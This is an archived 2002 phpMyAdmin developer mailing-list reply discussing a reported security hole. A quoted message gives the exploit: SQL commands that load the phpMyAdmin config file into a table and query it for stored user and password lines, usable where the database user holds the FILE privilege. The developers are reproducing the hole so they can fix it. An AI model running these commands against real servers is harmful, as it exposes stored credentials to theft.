[Phpmyadmin-devel] Re: MAJOR security hole

"Thomas Bähr [Office]" baehr at glaswald.de
Tue Aug 13 02:44:02 CEST 2002


At 13:12 12.08.2002 -0700, you wrote:
>On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > > > I've just merged a fix against that, but it needs some testing 
> since I do
> > > > > not have a machine here which is affected by this securety hole.
> > > > you won't like me, but I think we should wait to include a fix for a
> > > > "hole" until a developer can reproduce it.
> > >
> > > I'm going to set up a copy of PMA that exhibits the security hole for us
> > > to test out bug. Give me a day or two, as I have some more pressing work
> > > at the moment.
> > Robin,
> >
> > the "goto" problem?
> >
> > Marc
>I've checked out the goto problem, and you were right, it is fixed in the
>recent releases. It now limits you to files only in the phpMyAdmin install
>directory. Which can still be a problem in itself I think.
>
>On checking out the other problem with systems totally open using the
>config mechanism, try out this series of SQL Commands:
>
>First time around:
>CREATE TABLE testB ( t mediumtext );
>LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE
>testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';
>
>Where you need to change the path of the file, and the 'TERMINATED BY'
>parts for your own systems.
>
>When that completes,
>I ran this:
>SELECT * FROM testB WHERE t like '%Server%' AND (t like '%user%' or t like
>'%password%');
>
>To get just the PMA authentication data.
>
>Of course, this exploit requires that the user have the FILE privilege.

AND Create Rights on MYSQL as well ;-)) at least somethere ;-)

>This would apply to all cases where PMA has been set up with the user as
>root, or anybody else with the FILE privilege.
>
>I'm carrying on looking for more holes along these lines.
>
>--
>Robin Hugh Johnson
>E-Mail     : robbat2 at orbis-terrarum.net
>Home Page  : http://www.orbis-terrarum.net/?l=people.robbat2
>ICQ#       : 30269588 or 41961639
>
>
>
>-------------------------------------------------------
>This sf.net email is sponsored by: Dice - The leading online job board
>for high-tech professionals. Search and apply for tech jobs today!
>http://seeker.dice.com/seeker.epl?rel_code=31
>_______________________________________________
>Phpmyadmin-devel mailing list
>Phpmyadmin-devel at lists.sourceforge.net
>https://lists.sourceforge.net/lists/listinfo/phpmyadmin-devel





More information about the Developers mailing list